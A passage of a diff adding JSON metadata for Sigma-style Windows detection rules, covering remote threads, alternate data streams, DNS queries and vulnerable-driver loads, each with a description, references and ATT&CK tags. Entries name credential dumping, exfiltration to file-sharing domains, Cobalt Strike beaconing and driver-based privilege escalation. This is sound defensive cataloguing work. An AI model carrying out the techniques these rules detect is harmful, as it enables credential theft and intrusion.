outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "uuid": "f016c716-754a-467f-a39e-63c06f773987", + "value": "Suspicious Remote Thread Target", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml" + ], + "tags": "No established tags", + "creation_date": "2022/08/25", + "filename": "create_remote_thread_win_susp_remote_thread_target.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects a remote thread creation in suspicious target images", + "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "value": "Remote Thread Creation in Suspicious Targets", + "meta": { + "refs": [ + "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" + ], + "creation_date": "2022/03/16", + "filename": "create_remote_thread_win_susp_targets.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "uuid": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "value": "Remote Thread Creation Ttdinject.exe Proxy", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/05/16", + "filename": "create_remote_thread_win_ttdinjec.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)", + "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", + "value": "Executable in ADS", + "meta": { + "refs": [ + "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ], + "creation_date": "2018/06/03", + "filename": "create_stream_hash_ads_executable.yml", + "author": "Florian Roth, @0xrawsec", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "uuid": "573df571-a223-43bc-846e-3f98da481eca", + "value": "Creation Of a Suspicious ADS File Outside a Browser Download", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/10/22", + "filename": "create_stream_hash_creation_internet_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Other legitimate browsers not currently 
included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", + "value": "Hacktool Download", + "meta": { + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ], + "creation_date": "2022/08/24", + "filename": "create_stream_hash_hacktool_download.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "value": "Exports Registry Key To an Alternate Data Stream", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2020/10/07", + "filename": "create_stream_hash_regedit_export_to_ads.yml", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Detects the download of suspicious file type from a well-known file 
and paste sharing domain", + "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "value": "Suspicious File Download from File Sharing Domain", + "meta": { + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ], + "creation_date": "2022/08/24", + "filename": "create_stream_hash_susp_domain_ext_combo.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "value": "Unusual File Download from File Sharing Domain", + "meta": { + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ], + "creation_date": "2022/08/24", + "filename": "create_stream_hash_susp_domain_ext_combo_med.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "Detects the download of suspicious file type from URLs with IP", + "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "value": "Unusual File Download from Direct IP Address", + "meta": { + "refs": [ + 
"https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/09/07", + "filename": "create_stream_hash_susp_ip_domains.yml", + "author": "Nasreddine Bencherchali, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_stream_hash", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", + "value": "Query To Remote Access Software Domain", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_remote_access_software_domains.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/07/11", + "filename": "dns_query_remote_access_software_domains.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "FP may be caused in legitimate usage of the softwares mentioned above" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "uuid": "065cceea-77ec-4030-9052-fc0affea7110", + "value": "DNS Query for Anonfiles.com Domain", + "meta": { + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2022/07/15", + "filename": "dns_query_win_anonymfiles_com.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Legitimate access to anonfiles.com" + ], + 
"logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", + "value": "DNS HybridConnectionManager Service Bus", + "meta": { + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ], + "creation_date": "2021/04/12", + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", + "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "value": "AppInstaller Attempts From URL by DNS", + "meta": { + "refs": [ + "https://twitter.com/notwhickey/status/1333900137232523264", + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2021/11/24", + "filename": "dns_query_win_lobas_appinstaller.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "value": "Suspicious Cobalt Strike DNS Beaconing", + 
"meta": { + "refs": [ + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2021/11/09", + "filename": "dns_query_win_mal_cobaltstrike.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "value": "DNS Query for MEGA.io Upload Domain", + "meta": { + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2021/05/26", + "filename": "dns_query_win_mega_nz.yml", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "level": "high", + "falsepositive": [ + "Legitimate Mega upload" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. 
(DNS-record will saved in host cache for a while TTL).", + "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", + "value": "Possible DNS Rebinding", + "meta": { + "refs": [ + "https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1189" + ], + "creation_date": "2019/10/25", + "filename": "dns_query_win_possible_dns_rebinding.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", + "value": "Regsvr32 Network Activity - DNS", + "meta": { + "refs": [ + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2019/10/25", + "filename": "dns_query_win_regsvr32_network_activity.yml", + "author": "Dmitriy Lifanov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", + "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "value": "Suspicious DNS Query for IP Lookup Service APIs", + "meta": { + "refs": [ + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + 
"https://twitter.com/neonprimetime/status/1436376497980428318", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1590" + ], + "creation_date": "2021/07/08", + "filename": "dns_query_win_susp_ipify.yml", + "author": "Brandon George (blog post), Thomas Patzke (rule)", + "level": "medium", + "falsepositive": [ + "Legitimate usage of ip lookup services such as ipify API" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detect suspicious LDAP request from non-Windows application", + "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "value": "Suspicious LDAP Domain Access", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ldap.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ], + "creation_date": "2022/08/20", + "filename": "dns_query_win_susp_ldap.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Programs that also lookup the observed domain" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", + "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", + "value": "Suspicious TeamViewer Domain Access", + "meta": { + "refs": [ + "https://www.teamviewer.com/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/01/30", + "filename": "dns_query_win_susp_teamviewer.yml", + "author": "Florian Roth", + "level": "medium", + 
"falsepositive": [ + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "value": "Query Tor Onion Address", + "meta": { + "refs": [ + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.003" + ], + "creation_date": "2022/02/20", + "filename": "dns_query_win_tor_onion.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS queries for subdomains used for upload to ufile.io", + "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "value": "DNS Query for Ufile.io Upload Domain", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2022/06/23", + "filename": "dns_query_win_ufile_io.yml", + "author": "yatinwad and TheDFIRReport", + "level": "high", + "falsepositive": [ + "Legitimate Ufile upload" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "value": "Credential Dumping Tools Service Execution", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ], + "creation_date": "2017/03/05", + "filename": "driver_load_mal_creddumper.yml", + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "level": "critical", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "uuid": "d585ab5a-6a69-49a8-96e8-4a726a54de46", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ], + "creation_date": "2019/10/26", + "filename": "driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "level": "critical", + "falsepositive": [ + "Highly unlikely" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell script installed as a Service", + "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "value": "PowerShell Scripts Run by a Services", + "meta": { + "refs": [ + 
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/10/06", + "filename": "driver_load_powershell_script_installed_as_service.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of drivers used by Process Hacker and System Informer", + "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "value": "Process Hacker and System Informer Driver Load", + "meta": { + "refs": [ + "https://processhacker.sourceforge.io/", + "https://systeminformer.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_process_hacker.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ], + "creation_date": "2022/11/16", + "filename": "driver_load_process_hacker.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate user of process hacker or system informer by low level developers or system administrators" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects a driver load from a temporary directory", + "uuid": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "value": "Suspicious Driver Load from Temp", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_susp_temp_use.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2017/02/12", + "filename": "driver_load_susp_temp_use.yml", + "author": "Florian Roth", + "level": "high", + 
"falsepositive": [ + "There is a relevant set of false positives depending on applications in the environment" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "uuid": "7c676970-af4f-43c8-80af-ec9b49952852", + "value": "Vulnerable AVAST Anti Rootkit Driver Load", + "meta": { + "refs": [ + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_avast_anti_rootkit_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/28", + "filename": "driver_load_vuln_avast_anti_rootkit_driver.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "value": "Vulnerable Dell BIOS Update Driver Load", + "meta": { + "refs": [ + "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_dell_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ], + "creation_date": "2021/05/05", + "filename": "driver_load_vuln_dell_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": 
"Detects the load of known vulnerable drivers by hash value", + "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "value": "Vulnerable Driver Load", + "meta": { + "refs": [ + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/namazso/physmem_drivers", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", + "https://github.com/tandasat/ExploitCapcom", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", + "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/08/18", + "filename": "driver_load_vuln_drivers.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load 
of known vulnerable drivers via their names only.", + "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", + "value": "Vulnerable Driver Load By Name", + "meta": { + "refs": [ + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/namazso/physmem_drivers", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", + "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers_names.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/10/03", + "filename": "driver_load_vuln_drivers_names.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Some false positives may occure if one of the vulnerable driver names mentioned above didn't change it's name between versions. 
So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or it's exact known legitimate location (when possible)" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "uuid": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "value": "Vulnerable GIGABYTE Driver Load", + "meta": { + "refs": [ + "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", + "https://twitter.com/malmoeb/status/1551449425842786306", + "https://github.com/fengjixuchui/gdrv-loader", + "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", + "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_gigabyte_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/25", + "filename": "driver_load_vuln_gigabyte_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "uuid": "295c9289-acee-4503-a571-8eacaef36b28", + "value": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "meta": { + "refs": [ + "https://github.com/hacksysteam/HackSysExtremeVulnerableDriver", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hevd_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/08/18", + "filename": "driver_load_vuln_hevd_driver.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "uuid": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "value": "Vulnerable HW Driver Load", + "meta": { + "refs": [ + "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", + "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hw_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/26", + "filename": 